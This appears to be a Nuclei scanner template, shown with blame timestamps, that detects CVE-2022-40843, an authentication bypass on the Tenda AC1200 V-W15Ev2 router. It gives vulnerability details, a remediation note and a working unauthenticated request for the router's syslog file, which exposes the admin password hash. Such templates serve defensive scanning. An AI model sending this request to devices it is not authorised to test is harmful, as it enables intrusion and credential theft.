nuclei-templates/http/cves/2022/CVE-2022-40843.yaml

59 lines
2.2 KiB
YAML
Raw Normal View History

id: CVE-2022-40843
info:
name: Tenda AC1200 V-W15Ev2 - Authentication Bypass
author: gy741
2023-08-31 11:46:18 +00:00
severity: medium
description: |
The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability can lead to unauthorized configuration changes, network compromise, and potential access to sensitive information.
2023-09-06 11:59:08 +00:00
remediation: |
Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability.
reference:
2022-11-03 18:01:09 +00:00
- https://boschko.ca/tenda_ac1200_router
2023-08-01 06:13:38 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40843
classification:
2023-08-31 11:46:18 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
cvss-score: 4.9
cve-id: CVE-2022-40843
2023-08-01 06:13:38 +00:00
cwe-id: CWE-287
2024-05-31 19:23:20 +00:00
epss-score: 0.37501
epss-percentile: 0.97193
cpe: cpe:2.3:h:tenda:ac1200_v-w15ev2:-:*:*:*:*:*:*:*
2023-08-01 06:13:38 +00:00
metadata:
max-request: 1
2023-08-31 11:46:18 +00:00
vendor: tenda
2024-05-31 19:23:20 +00:00
product: ac1200_v-w15ev2
2024-01-14 09:21:50 +00:00
tags: cve2022,cve,tenda,auth-bypass,router,iot
2023-08-02 04:30:36 +00:00
http:
- raw:
- |
GET /goform/downloadSyslog/syslog.log HTTP/1.1
Host: {{Hostname}}
Cookie: W15Ev2_user=
matchers-condition: and
matchers:
2023-08-01 06:13:38 +00:00
- type: regex
regex:
- '^0\d{3}$'
2022-11-03 18:01:09 +00:00
- type: word
2023-08-01 06:13:38 +00:00
part: body
2022-11-03 18:01:09 +00:00
words:
2023-08-01 06:13:38 +00:00
- "[system]"
- "[error]"
- "[wan1]"
condition: or
2022-11-03 18:01:09 +00:00
- type: word
part: header
words:
- "Content-type: config/conf"
- type: status
status:
- 200
# digest: 4a0a0047304502207422cca17346734af8803e05435d968ee607fb4d1020131202813e2275ce90fd022100d04e21dd1aeed78f39fe54ffd517fc0697342080ce5c9031dc72b12c2278db35:922c64590222798bb761d5b6d8e72950